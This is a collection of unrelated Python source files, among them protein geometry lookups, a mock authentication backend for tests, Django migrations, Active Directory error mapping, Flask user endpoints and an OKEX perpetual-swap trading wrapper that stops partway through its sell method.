BOND_ANGLE_PSEUDO_SIDECHAIN = {'ALA': 89.8283, 'CYS': 118.8, 'ASP': 117.5,
    'GLU': 108.9, 'PHE': 126.1, 'GLY': 89.8283, 'HIS': 126.1, 'ILE': 100.3,
    'LYS': 111.7, 'LEU': 108.9, 'MET': 103.1, 'ASN': 118.8, 'PRO': 126.1,
    'GLN': 106.0, 'ARG': 114.6, 'SER': 91.7, 'THR': 94.5, 'VAL': 88.8,
    'TRP': 108.9, 'TYR': 126.1}
def get_bond_length(atom1, atom2, residue):
    """ Get the length of the bond between two given atoms, according to the
    residue.
    @param atom1: The first atom in the bond.
    @type atom1: str (one of the atoms defined in the L{ATOMS} constant)
    @param atom2: The second atom in the bond.
    @type atom2: str (one of the atoms defined in the L{ATOMS} constant)
    @param residue: Three-letter residue name (e.g. 'ALA'), used to select
    residue-specific values.
    @type residue: str
    @rtype: float
    @return: The bond length in Ångström.
    """
    bond_length = 0.0
    # Hydrogen atoms are not from Engh, Huber, 1991.
    # (recognised positionally: any atom between 'H' and 'H3' in ATOMS)
    if ATOMS.index(atom2) >= ATOMS.index('H') and \
        ATOMS.index(atom2) <= ATOMS.index('H3'):
        bond_length = 1.0
    else:
        # atoms are ordered in the bond length dictionary to avoid
        # duplication of entries
        if atom1 > atom2:
            atom1, atom2 = atom2, atom1
        # lookup order: main chain, then side chain, then the per-residue
        # pseudo side-chain fallback
        try:
            bond_length = BOND_LENGTH_MAINCHAIN[(atom1, atom2)][residue]
        except KeyError:
            try:
                bond_length = BOND_LENGTH_SIDECHAIN[residue][atom1, atom2]
            except KeyError:
                bond_length = BOND_LENGTH_PSEUDO_SIDECHAIN[residue]
    # NOTE(review): `assert` is stripped under `python -O`; this guard only
    # fires in non-optimised runs.
    assert bond_length != 0, "Bond length could not be obtained."
    return bond_length
def get_bond_angle(atom1, atom2, atom3, residue):
    """ Return the bond angle, in radians, formed by three atoms of a residue.
    @param atom1: The first atom in the bond.
    @type atom1: str (one of the atoms defined in the L{ATOMS} constant)
    @param atom2: The second atom in the bond.
    @type atom2: str (one of the atoms defined in the L{ATOMS} constant)
    @param atom3: The third atom in the bond.
    @type atom3: str (one of the atoms defined in the L{ATOMS} constant)
    @param residue: Residue name used to select the table entry.
    @type residue: str
    @rtype: float
    @return: The bond angle in radians.
    """
    triple = (atom1, atom2, atom3)
    # Lookup order: main-chain table, then side-chain table, then the
    # per-residue pseudo-sidechain fallback.
    try:
        angle = BOND_ANGLE_MAINCHAIN[triple][residue]
    except KeyError:
        try:
            angle = BOND_ANGLE_SIDECHAIN[residue][triple]
        except KeyError:
            angle = BOND_ANGLE_PSEUDO_SIDECHAIN[residue]
    assert angle != 0, "Bond angle could not be obtained."
    # Tables are in degrees; convert with the exact same expression as the
    # original so float results stay bit-identical.
    return angle * math.pi / 180.0
|
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from st2auth.backends.base import BaseAuthenticationBackend
# auser:apassword in b64
DUMMY_CREDS = 'YXVzZXI6YXBhc3N3b3Jk'

# Public API of this test-support module.
__all__ = [
    'DUMMY_CREDS',
    'MockAuthBackend',
    'MockRequest',
    'get_mock_backend'
]
class MockAuthBackend(BaseAuthenticationBackend):
    """In-memory authentication backend used by tests.

    Accepts exactly two hard-coded credential pairs and reports the group
    memberships stored on the class-level ``groups`` attribute.
    """

    # Group memberships returned for every user; tests assign to this directly.
    groups = []

    # username -> expected password
    _VALID_CREDENTIALS = {
        'auser': 'apassword',
        'username': 'password:password',
    }

    def authenticate(self, username, password):
        """Return True only for one of the hard-coded username/password pairs."""
        expected = self._VALID_CREDENTIALS.get(username)
        return expected is not None and expected == password

    def get_user(self, username):
        """Identity lookup: the username itself is the user object."""
        return username

    def get_user_groups(self, username):
        """Return the shared, class-level group list for any username."""
        return self.groups
class MockRequest(object):
    """Minimal stand-in for an auth token request used by tests."""

    # Class-level defaults; instances override ``ttl`` in __init__ and tests
    # assign the remaining attributes as needed.
    user = None
    ttl = None
    impersonate_user = None
    nickname_origin = None

    def __init__(self, ttl):
        self.ttl = ttl
def get_mock_backend(name):
    """Return a fresh MockAuthBackend.

    ``name`` is accepted for backend-factory API parity and ignored.
    """
    backend = MockAuthBackend()
    return backend
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Initial schema migration: creates the ``Module`` table."""

    # No prior migrations are required.
    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Module',
            fields=[
                ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
                ('name', models.CharField(max_length=45)),
                ('ordernum', models.IntegerField()),
                ('enabled', models.BooleanField(default=True)),
                ('description', models.CharField(max_length=45)),
                # Free-form text; optional at both form and database level.
                ('required', models.CharField(max_length=45, blank=True, null=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
|
# Generated by Django 4.0.3 on 2022-03-09 15:20
import cloudinary.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration for the app: Image, Profile, Likes and Comment tables.

    Auto-generated by Django 4.0.3; edit the models and generate a new
    migration rather than modifying this one.
    """

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Image',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Stored on Cloudinary; the field holds the Cloudinary public id.
                ('image', cloudinary.models.CloudinaryField(max_length=255, verbose_name='image')),
                ('image_name', models.CharField(max_length=60)),
                ('image_date', models.DateTimeField(auto_now_add=True)),
                ('image_caption', models.TextField(blank=True)),
                # Denormalized counters alongside the Likes/Comment tables below.
                ('likes', models.IntegerField(default=0)),
                ('comments', models.IntegerField(default=0)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('username', models.CharField(max_length=50)),
                ('date_joined', models.DateTimeField(auto_now_add=True)),
                ('bio', models.CharField(max_length=500)),
                ('profile_photo', cloudinary.models.CloudinaryField(max_length=255, verbose_name='image')),
                # One profile per auth user.
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Likes',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # NOTE(review): reverse accessor name 'images' on Image reads
                # oddly for likes — confirm before relying on it in queries.
                ('image', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images', to='mainapp.image')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('comment', models.CharField(max_length=60)),
                ('comment_date', models.DateTimeField(auto_now_add=True)),
                ('image', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.image')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
from .core import OcrPredictionHead, HeadOutputKeys
from .ctc import CtcPredictionHead
from .rnn_attention import RnnAttentionHead
from .factory import PredictionHeadsFactory
# Registry of available OCR prediction heads, keyed by the name used in
# configuration files.
FACTORY = PredictionHeadsFactory()
FACTORY.register('ctc', CtcPredictionHead)
FACTORY.register('rnn_attn', RnnAttentionHead)

# Head types that use attention (for attention-specific handling downstream).
# Idiom fix: use a set literal instead of set([...]) (flake8-comprehensions C405).
ATTENTION_HEAD_TYPES = {
    'rnn_attn',
}
|
# -*- coding: iso-8859-1 -*-
import pywintypes
from . import utils
class ActiveDirectoryError (Exception):
    u"""Base class for all AD Exceptions"""
    pass

class MemberAlreadyInGroupError (ActiveDirectoryError):
    u"""Raised for ERROR_MEMBER_IN_ALIAS (see WINERROR_MAP below)."""
    pass

class MemberNotInGroupError (ActiveDirectoryError):
    u"""Raised for ERROR_MEMBER_NOT_IN_ALIAS (see WINERROR_MAP below)."""
    pass

class BadPathnameError (ActiveDirectoryError):
    u"""Raised for E_ADS_BAD_PATHNAME (see WINERROR_MAP below)."""
    pass

class AttributeNotFound (ActiveDirectoryError):
    u"""AD attribute lookup failure (not referenced in WINERROR_MAP here)."""
    pass

class LogonError (ActiveDirectoryError):
    u"""Raised for the logon-failure HRESULT mapped in WINERROR_MAP below."""
    pass
def wrapper (winerror_map, default_exception):
    u"""Used by each module to map specific windows error codes onto
    Python exceptions. Always includes a default which is raised if
    no specific exception is found.

    :param winerror_map: dict mapping HRESULT/errno codes to exception classes
    :param default_exception: class raised when a code is not in the map
    :return: callable taking (function, *args, **kwargs) and translating
        pywintypes/OS errors raised by the call
    """
    def _wrapped (function, *args, **kwargs):
        u"""Call a Windows API with parameters, and handle any
        exception raised either by mapping it to a module-specific
        one or by passing it back up the chain.
        """
        try:
            return function (*args, **kwargs)
        # NOTE: Python 2 except syntax — the COM error tuple is unpacked
        # directly in the except clause.
        except pywintypes.com_error, (hresult_code, hresult_name, additional_info, parameter_in_error):
            # COM reports signed HRESULTs; normalize to unsigned for map lookup.
            hresult_code = utils.signed_to_unsigned (hresult_code)
            exception_string = [u"%08X - %s" % (hresult_code, hresult_name)]
            if additional_info:
                wcode, source_of_error, error_description, whlp_file, whlp_context, scode = additional_info
                scode = utils.signed_to_unsigned (scode)
                exception_string.append (u" Error in: %s" % source_of_error)
                exception_string.append (u" %08X - %s" % (scode, (error_description or "").strip ()))
            else:
                scode = None
            # Prefer the outer HRESULT, then the nested status code, then the default.
            exception = winerror_map.get (hresult_code, winerror_map.get (scode, default_exception))
            raise exception (hresult_code, hresult_name, u"\n".join (exception_string))
        except pywintypes.error, (errno, errctx, errmsg):
            exception = winerror_map.get (errno, default_exception)
            raise exception (errno, errctx, errmsg)
        except (WindowsError, IOError), err:
            # NOTE(review): if the map explicitly holds a falsy value for this
            # errno, the original error is silently swallowed — confirm intended.
            exception = winerror_map.get (err.errno, default_exception)
            if exception:
                raise exception (err.errno, u"", err.strerror)
    return _wrapped
# HRESULT / Win32 error codes surfaced by ADSI and directory operations.
ERROR_DS_NO_SUCH_OBJECT = 0x80072030
ERROR_OBJECT_ALREADY_EXISTS = 0x80071392
ERROR_MEMBER_NOT_IN_ALIAS = 0x80070561
ERROR_MEMBER_IN_ALIAS = 0x80070562
E_ADS_BAD_PATHNAME = 0x80005000
ERROR_NOT_IMPLEMENTED = 0x80004001
E_NOINTERFACE = 0x80004002
E_ADS_PROPERTY_NOT_FOUND = 0x8000500D
E_ADS_PROPERTY_NOT_SUPPORTED = 0x80005006
E_ADS_PROPERTY_INVALID = 0x80005007

# Error-code -> exception class mapping consumed by wrapper() above.
WINERROR_MAP = {
    ERROR_MEMBER_NOT_IN_ALIAS : MemberNotInGroupError,
    ERROR_MEMBER_IN_ALIAS : MemberAlreadyInGroupError,
    E_ADS_BAD_PATHNAME : BadPathnameError,
    ERROR_NOT_IMPLEMENTED : NotImplementedError,
    E_ADS_PROPERTY_NOT_FOUND : AttributeError,
    E_ADS_PROPERTY_NOT_SUPPORTED : AttributeError,
    E_ADS_PROPERTY_INVALID : AttributeError,
    0x8009030C : LogonError,  # raw logon-failure HRESULT mapped directly
}

# Default wrapper used throughout the package.
wrapped = wrapper (WINERROR_MAP, ActiveDirectoryError)
|
import setuptools
# Read the long description from the README so PyPI renders the project page.
with open('README.md', 'r', encoding='utf-8') as fh:
    long_description = fh.read()

setuptools.setup(
    name='inkrement',
    version='0.0.1',
    author='Eric Boxer',
    author_email='ecb2198@columbia.edu',
    description='Incremental data visualization in python',
    long_description=long_description,
    long_description_content_type='text/markdown',
    url='https://github.com/Ecboxer/inkrement',
    packages=['inkrement'],
    install_requires=[
        # Fix: requirement specifiers must name the distribution
        # ('matplotlib'), not a module path ('matplotlib.pyplot'),
        # which pip cannot resolve.
        'matplotlib>=2.2.3'
    ],
    classifiers=[
        'Programming Language :: Python :: 3',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent'
    ]
)
|
# coding: utf-8
from abc import abstractmethod
from .tui import TUI
class TUIDisplay(TUI):
    """Terminal display base that renders inventory data as aligned columns."""

    def __init__(self, inventory):
        super(TUIDisplay, self).__init__()
        self.term = TUI()
        self.inventory = inventory

    def format_columns(self, data):
        """Left-justify every cell so each column fits its widest entry.

        Falsy cells are dropped entirely and do not occupy a column slot,
        so subsequent cells in that row shift left. Each column is padded
        to its maximum width plus two spaces.
        """
        # First pass: compute the maximum width of each (post-skip) column.
        widths = []
        for row in data:
            for col, cell in enumerate(c for c in row if c):
                if col < len(widths):
                    widths[col] = max(widths[col], len(cell))
                else:
                    widths.append(len(cell))
        # Second pass: pad each surviving cell and join the row into a line.
        lines = []
        for row in data:
            padded = [cell.ljust(widths[col] + 2)
                      for col, cell in enumerate(c for c in row if c)]
            lines.append("".join(padded))
        return lines

    @abstractmethod
    def display(self):
        """Render the inventory; concrete subclasses must implement this."""
        raise NotImplementedError
|
import pytest
from zipfile import ZipFile
from pyPreservica import *
def test_export_file_wait():
    """Synchronously export an asset as OPEX and validate the downloaded zip."""
    client = EntityAPI()
    asset = client.asset("c365634e-9fcc-4ea1-b47f-077f55df9d64")
    zip_file = client.export_opex_sync(asset)
    assert os.path.exists(zip_file)
    assert os.stat(zip_file).st_size > 1066650
    with ZipFile(zip_file, 'r') as archive:
        assert len(archive.namelist()) == 6
    os.remove(zip_file)
def test_export_file_no_wait():
    """Start an async OPEX export, poll it to completion, then validate the zip."""
    client = EntityAPI()
    asset = client.asset("c365634e-9fcc-4ea1-b47f-077f55df9d64")
    pid = client.export_opex_async(asset)
    # Busy-poll the workflow until it leaves the ACTIVE state.
    status = "ACTIVE"
    while status == "ACTIVE":
        status = client.get_async_progress(pid)
    assert status == "COMPLETED"
    zip_file = client.download_opex(pid)
    assert os.path.exists(zip_file)
    assert os.stat(zip_file).st_size > 1066650
    with ZipFile(zip_file, 'r') as archive:
        assert len(archive.namelist()) == 6
    os.remove(zip_file)
|
from pprint import pprint
from flask import jsonify, request
from flask_marshmallow.sqla import ValidationError
from flask_restful import Resource, abort
from flask_auth.app.extensions.database.database_framework import db
from flask_auth.app.blueprints.users.models import UserModel
from flask_auth.app.blueprints.users.schemas import (
UserListSchema,
UserCreateSchema,
UserDetailsSchema,
UserUpdateSchema,
)
from flask_auth.app.common.loaders import get_swagger_file_path
from flasgger import swag_from
class UserCreateListResource(Resource):
    """REST resource exposing user listing (GET) and creation (POST)."""

    __module__ = "users"

    # Shared schema/model instances reused across requests.
    user_schema = UserListSchema()
    users_schema = UserListSchema(many=True)
    user_create_schema = UserCreateSchema()
    user_model = UserModel()

    @swag_from(get_swagger_file_path(__name__, "list.yml"))
    def get(self):
        """Return every registered user, serialized with UserListSchema."""
        user_list = self.users_schema.dump(self.user_model.query.all())
        if not user_list:
            # NOTE(review): 401 means "unauthorized"; an empty listing is
            # usually a 404 or an empty 200 — confirm the intended contract.
            return abort(401, message="There is no user registered")
        return user_list

    @swag_from(get_swagger_file_path(__name__, "create.yml"))
    def post(self):
        """Create a user from the JSON request body."""
        try:
            user = self.user_create_schema.load(request.json)
            db.session.add(user)
            db.session.commit()
            db.session.close()
            return jsonify(message="User created successfully")
        except ValidationError as error:
            pprint(error.messages)
            # NOTE(review): validation failures are conventionally 400/422,
            # not 401 — confirm before changing client-facing behavior.
            return abort(401)
class UserDetailUpdateRemoveResource(Resource):
    """REST resource for one user: read (GET), update (PUT), delete (DELETE)."""

    user_details_schema = UserDetailsSchema()
    user_update_schema = UserUpdateSchema()
    user_model = UserModel()

    @swag_from(get_swagger_file_path(__name__, "read.yml"))
    def get(self, _id: int):
        """Return the user with primary key ``_id`` in detail form."""
        user = self.user_details_schema.dump(
            self.user_model.query.filter_by(id=_id).first()
        )
        if not user:
            # NOTE(review): "not found" is conventionally 404, not 401 —
            # confirm before changing the client-facing contract.
            return abort(401, message="User not found")
        return user

    # TODO: Improve this update approach
    @swag_from(get_swagger_file_path(__name__, "update.yml"))
    def put(self, _id: int):
        """Update the user's login from the JSON request body."""
        try:
            db_user = self.user_model.query.filter_by(id=_id).first()
            if not db_user:
                return abort(401, message="User not found")
            new_user_values = self.user_update_schema.load(request.json)
            # Only the login field is copied; other submitted fields are ignored.
            db_user.login = new_user_values.login
            db.session.commit()
            db.session.close()
            return jsonify(message="User updated successfully")
        except ValidationError as error:
            pprint(error.messages)
            return abort(401)

    @swag_from(get_swagger_file_path(__name__, "delete.yml"))
    def delete(self, _id: int):
        """Delete the user with primary key ``_id``."""
        try:
            user = self.user_model.query.filter_by(id=_id).first()
            if user:
                db.session.delete(user)
                db.session.commit()
                db.session.close()
                return jsonify(message="User removed successfully")
            return abort(401, message="User not found")
        except ValidationError as error:
            pprint(error.messages)
            return abort(
                401,
                message="Some information is lacking or invalid. Please check them and try it again.",
            )
|
class Solution:
    def productExceptSelf(self, nums: List[int]) -> List[int]:
        """Return a list where entry i is the product of all nums except nums[i].

        Uses a prefix sweep followed by a suffix sweep (no division).
        Raises for inputs shorter than two elements.
        """
        if len(nums) < 2:
            raise Exception("Invalid Array")
        n = len(nums)
        result = [1] * n
        # Forward sweep: result[idx] becomes the product of everything left of idx.
        running = 1
        for idx in range(n):
            result[idx] = running
            running *= nums[idx]
        # Backward sweep: fold in the product of everything right of idx.
        running = 1
        for idx in range(n - 1, -1, -1):
            result[idx] *= running
            running *= nums[idx]
        return result
|
'''
Node metadata.
Used when we encounter variable names in our AST.
Essentially, we're trying to deduce how variables are used. As a key part of
torc involves pulling data from all around the document in order to provide
document-wide data to the RNN as the RNN looks at set of lines, we use
NodeMetadata in order to keep track of what is what. Then, when it comes time,
we aggregate our metadata into a new metadata instance (needs to be split into
two different classes). The AST to torc translator then takes the metadata
and essentially replaces the appropriate variable or variables with the
metadata from this class as required.
In doing this, we effectively contextualize each variable in such a way that
the RNN has access to the way the variable is used relative to both itself
and other variables present in the document.
Note: We have some extra functions and code present from an earlier version.
Because this is still a proof of concept, I have not yet taken the time to
fully clean out old code from when I was exploring whether this concept is even
feasible.
'''
import json, time, math, re
from copy import deepcopy
from collections import defaultdict, Counter
import pandas as pd
class NodeMetadata:
    """Per-variable usage metadata gathered while walking the AST.

    Tracks how often a name is referenced, its aliases, and how often it is
    used as data versus as a callable, then derives normalized scores via
    set_standards() for the AST-to-torc translator to consume.
    """

    def __init__(self, fuzz_amount=10):
        self._called = 1
        self._name = ''
        self._intent = ''
        self._aliases = []
        self._func_count = 0
        self._data_count = 0
        self._FUZZ_AMT = fuzz_amount

    # --- identity -----------------------------------------------------------
    # Equality/hash are keyed on (name, intent) only.

    def __eq__(self, other):
        if type(other) != type(self):
            return False
        return (self._name, self._intent) == (other._name, other._intent)

    def __hash__(self):
        # Legacy string-tag hash from earlier string-based metadata tags.
        # Keep until the AST translator is confirmed not to depend on it.
        return hash(self._name + '!!' + self._intent)

    def __cmp__(self, other):
        # Python 2 relic (Python 3 ignores __cmp__); kept for compatibility.
        return self.__eq__(other)

    # --- normalization ------------------------------------------------------

    def set_standards(self, vocab):
        """Compute normalized usage scores relative to every node in *vocab*.

        The *_max scores are normalized against the corpus-wide maxima; the
        plain scores are normalized against this node's own combined intent
        count. All denominators are padded by one to avoid division by zero.
        """
        peers = list(vocab.values())
        max_called = max(p.get_called() for p in peers) + 1.
        max_aliases = max(len(p.get_aliases()) for p in peers) + 1.
        max_data = max(p.get_data_intent_count() for p in peers) + 1.
        max_func = max(p.get_func_intent_count() for p in peers) + 1.
        # NOTE(review): both localized denominators are the same combined
        # total, matching the original code — confirm that is intentional.
        local_total = self.get_data_intent_count() + self.get_func_intent_count() + 1
        digits = self._FUZZ_AMT  # fuzz_amt is legacy; kept until a later update
        self._standard_intent_data_max = round(self.get_data_intent_count() / float(max_data), digits)
        self._standard_intent_func_max = round(self.get_func_intent_count() / float(max_func), digits)
        self._standard_intent_data = round(self.get_data_intent_count() / float(local_total), digits)
        self._standard_intent_func = round(self.get_func_intent_count() / float(local_total), digits)
        self._standard_called = round(self.get_called() / float(max_called), digits)
        self._standard_aliases = round(len(self.get_aliases()) / float(max_aliases), digits)

    def get_standardized_intent_data(self):
        return self._standard_intent_data

    def get_standardized_intent_func(self):
        return self._standard_intent_func

    def get_standardized_called(self):
        return self._standard_called

    def get_standardized_aliases(self):
        return self._standard_aliases

    def get_standardized_intent_data_max(self):
        return self._standard_intent_data_max

    def get_standardized_intent_func_max(self):
        return self._standard_intent_func_max

    # --- counters and accessors --------------------------------------------

    def called(self):
        """Record one more reference to this variable."""
        self._called += 1

    def get_func_intent_count(self):
        return self._func_count

    def get_data_intent_count(self):
        return self._data_count

    def set_func_intent_count(self, f_count):
        self._func_count = f_count

    def set_data_intent_count(self, d_count):
        self._data_count = d_count

    def get_called(self):
        return self._called

    def get_aliases(self):
        return self._aliases

    def get_intent(self):
        return self._intent

    def get_name(self):
        return self._name

    def set_called(self, called):
        self._called = called

    def set_aliases(self, aliases):
        self._aliases = aliases

    def set_intent(self, intent):
        self._intent = intent

    def set_name(self, name):
        self._name = name
|
import os
import json
import multiprocessing
import random
import math
from math import log2, floor
from functools import partial
from contextlib import contextmanager, ExitStack
from pathlib import Path
from shutil import rmtree
from collections import Counter
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import torch
import torchvision
from torch.cuda.amp import autocast, GradScaler
from torch.optim import Adam
from torch import nn, einsum
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torch.autograd import grad as torch_grad
from torch.utils.data.distributed import DistributedSampler
from torch.utils.data.sampler import Sampler
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.data.dataset import Dataset
from PIL import Image
import pandas as pd
from kornia import filter2D
from tensorboardX import SummaryWriter
import numpy as np
import torch.distributed as dist
from tqdm import tqdm
import torch.multiprocessing as mp
import fire
from einops import rearrange
from gsa_pytorch import GSA
from linear_attention_transformer import ImageLinearAttention
from torchvision import transforms
|
"""
okex永续合约
https://www.okex.com/docs/zh/#swap-README
Author: Gary-Hertel
Date: 2020/10/27
email: purequant@foxmail.com
"""
import time
from purequant.exchange.okex import swap_api as okexswap
from purequant.config import config
from purequant.exceptions import *
from purequant.logger import logger
class OKEXSWAP:
    def __init__(self, access_key, secret_key, passphrase, instrument_id, margin_mode=None, leverage=None):
        """OKEX perpetual swap wrapper.

        :param access_key: API access key
        :param secret_key: API secret key
        :param passphrase: API passphrase
        :param instrument_id: e.g. "BTC-USDT-SWAP", "BTC-USD-SWAP"
        :param margin_mode: "fixed" selects isolated margin (leverage is set
            per side); any other value selects cross margin
        :param leverage: leverage multiple; defaults to 20 when omitted
        """
        self.__access_key = access_key
        self.__secret_key = secret_key
        self.__passphrase = passphrase
        self.__instrument_id = instrument_id
        self.__okex_swap = okexswap.SwapAPI(self.__access_key, self.__secret_key, self.__passphrase)
        self.__leverage = leverage or 20
        if margin_mode == "fixed":
            # Isolated margin: leverage is set separately for sides 1 and 2.
            try:
                self.__okex_swap.set_leverage(leverage=self.__leverage, instrument_id=self.__instrument_id, side=1)
                self.__okex_swap.set_leverage(leverage=self.__leverage, instrument_id=self.__instrument_id, side=2)
            except Exception as e:
                logger.error("OKEX永续合约设置杠杆倍数失败!请检查账户是否已设置成逐仓模式!错误:{}".format(str(e)))
        else:
            # Cross margin: a single side=3 call sets the leverage.
            try:
                self.__okex_swap.set_leverage(leverage=self.__leverage, instrument_id=self.__instrument_id, side=3)
            except Exception as e:
                logger.error("OKEX永续合约设置杠杆倍数失败!请检查账户是否已设置成全仓模式!错误:{}".format(str(e)))
    def get_single_equity(self, currency):
        """Fetch the account equity of a single swap instrument.

        :param currency: instrument id, e.g. "TRX-USDT-SWAP"
        :return: the equity as a float
        """
        data = self.__okex_swap.get_coin_account(instrument_id=currency)
        result = float(data["info"]["equity"])
        return result
    def buy(self, price, size, order_type=None):
        """Place a buy order (take_order type 1 — open long, per OKEX v3
        order-type semantics), applying the configured trade-assistant logic
        (price/time/automatic cancellation with reissue).

        :param price: limit price
        :param size: contract quantity; on reissue the unfilled remainder is used
        :param order_type: OKEX order-type flag; defaults to 0 (ordinary order)
        :return: dict with the final order info in live mode, or a backtest
            placeholder string in backtest mode
        :raises SendOrderError: if the initial submission fails
        """
        if config.backtest is False:  # live-trading mode
            order_type = order_type or 0    # default to an ordinary order when order_type is omitted
            try:
                result = self.__okex_swap.take_order(self.__instrument_id, 1, price, size, order_type=order_type)
            except Exception as e:
                raise SendOrderError(e)
            order_info = self.get_order_info(order_id=result['order_id'])  # query the order state once after placing
            # NOTE(review): "失败 " is compared with a trailing space throughout
            # this module — confirm it matches what get_order_info() returns.
            if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":  # fully filled or failed: return immediately
                return {"【交易提醒】下单结果": order_info}
            # The order is neither fully filled nor failed past this point.
            if config.price_cancellation:  # price cancellation: cancel and reissue if the last price moved beyond the threshold
                if order_info["订单状态"] == "等待成交":
                    if float(self.get_ticker()['last']) >= price * (1 + config.price_cancellation_amplitude):
                        try:
                            self.revoke_order(order_id=result['order_id'])
                            state = self.get_order_info(order_id=result['order_id'])
                            if state['订单状态'] == "撤单成功":
                                return self.buy(float(self.get_ticker()['last']) * (1 + config.reissue_order),
                                                size - state["已成交数量"])
                        except:
                            order_info = self.get_order_info(order_id=result['order_id'])  # re-query once after the failed cancel
                            if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                                return {"【交易提醒】下单结果": order_info}
                if order_info["订单状态"] == "部分成交":
                    if float(self.get_ticker()['last']) >= price * (1 + config.price_cancellation_amplitude):
                        try:
                            self.revoke_order(order_id=result['order_id'])
                            state = self.get_order_info(order_id=result['order_id'])
                            if state['订单状态'] == "撤单成功":
                                return self.buy(float(self.get_ticker()['last']) * (1 + config.reissue_order),
                                                size - state["已成交数量"])
                        except:
                            order_info = self.get_order_info(order_id=result['order_id'])  # re-query once after the failed cancel
                            if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                                return {"【交易提醒】下单结果": order_info}
            if config.time_cancellation:  # time cancellation: cancel and reissue if still unfilled after the configured delay
                time.sleep(config.time_cancellation_seconds)
                order_info = self.get_order_info(order_id=result['order_id'])
                if order_info["订单状态"] == "等待成交":
                    try:
                        self.revoke_order(order_id=result['order_id'])
                        state = self.get_order_info(order_id=result['order_id'])
                        if state['订单状态'] == "撤单成功":
                            return self.buy(float(self.get_ticker()['last']) * (1 + config.reissue_order),
                                            size - state["已成交数量"])
                    except:
                        order_info = self.get_order_info(order_id=result['order_id'])  # re-query once after the failed cancel
                        if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                            return {"【交易提醒】下单结果": order_info}
                if order_info["订单状态"] == "部分成交":
                    try:
                        self.revoke_order(order_id=result['order_id'])
                        state = self.get_order_info(order_id=result['order_id'])
                        if state['订单状态'] == "撤单成功":
                            return self.buy(float(self.get_ticker()['last']) * (1 + config.reissue_order),
                                            size - state["已成交数量"])
                    except:
                        order_info = self.get_order_info(order_id=result['order_id'])  # re-query once after the failed cancel
                        if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                            return {"【交易提醒】下单结果": order_info}
            if config.automatic_cancellation:
                # If the order is not fully filled and neither price nor time
                # cancellation is configured, cancel automatically and return
                # the order/cancel outcome.
                try:
                    self.revoke_order(order_id=result['order_id'])
                    state = self.get_order_info(order_id=result['order_id'])
                    return {"【交易提醒】下单结果": state}
                except:
                    order_info = self.get_order_info(order_id=result['order_id'])  # re-query once after the failed cancel
                    if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":
                        return {"【交易提醒】下单结果": order_info}
            else:  # trade assistant disabled: return the queried order info directly
                return {"【交易提醒】下单结果": order_info}
        else:  # backtest mode
            return "回测模拟下单成功!"
    def sell(self, price, size, order_type=None):
        """Place a sell order (take_order type 3 — close long, per OKEX v3
        order-type semantics), applying the configured trade-assistant logic
        (price/time/automatic cancellation with reissue).

        :param price: limit price
        :param size: contract quantity; on reissue the unfilled remainder is used
        :param order_type: OKEX order-type flag; defaults to 0 (ordinary order)
        :return: dict with the final order info in live mode, or a backtest
            placeholder string in backtest mode
        :raises SendOrderError: if the initial submission fails
        """
        if config.backtest is False:
            order_type = order_type or 0
            try:
                result = self.__okex_swap.take_order(self.__instrument_id, 3, price, size, order_type=order_type)
            except Exception as e:
                raise SendOrderError(e)
            order_info = self.get_order_info(order_id=result['order_id'])  # query the order state once after placing
            if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ":  # fully filled or failed: return immediately
                return {"【交易提醒】下单结果": order_info}
            # The order is neither fully filled nor failed past this point.
            if config.price_cancellation:  # price cancellation: cancel and reissue if the last price moved beyond the threshold
                if order_info["订单状态"] == "等待成交":
                    if float(self.get_ticker()['last']) <= price * (1 - config.price_cancellation_amplitude):
                        try:
                            self.revoke_order(order_id=result['order_id'])
                            state = self.get_order_info(order_id=result['order_id'])
                            if state['订单状态'] == "撤单成功":
